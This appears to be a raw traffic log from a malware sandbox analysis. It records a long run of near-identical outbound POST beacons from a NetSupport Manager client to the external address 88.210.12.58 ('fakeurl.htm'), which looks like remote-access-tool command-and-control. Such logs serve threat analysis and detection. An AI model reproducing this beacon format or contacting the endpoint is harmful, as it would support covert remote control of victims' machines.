Dec 10, 2024 08:58:33.200965881 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:33.353286982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:33.763048887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:33.863976955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:33.963984966 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.064986944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.164977074 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.265989065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.365962982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.466017962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.566973925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.667006969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.768093109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.868968010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:34.972687960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.069953918 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.169980049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.270968914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.371105909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.471004009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.572690964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.676704884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.773044109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.873997927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:35.975028038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.075000048 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.174981117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.276000977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.375993013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.476970911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.577982903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.677994013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.778011084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.879719973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:36.979492903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.080698967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.180687904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.278974056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.379064083 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.479958057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.579972982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.679980040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.784523964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.881237030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:37.982069969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.091120005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.191973925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.291991949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.393030882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.493012905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.593967915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.695106983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.794981003 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.898695946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:38.998759031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.095973969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.196974993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.298964024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.401809931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.502999067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.603004932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.706932068 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.804968119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:39.906040907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.007002115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.107009888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.206999063 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.307998896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.408010960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.508025885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.609021902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.710042000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.811048031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:40.914705038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.014825106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.114808083 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.212970972 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.314743042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.414001942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.514758110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.618733883 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.714987040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.816699028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:41.915975094 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.017009020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.117993116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.219018936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.319976091 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.419981956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.519998074 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.621015072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.721024990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:42.824695110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
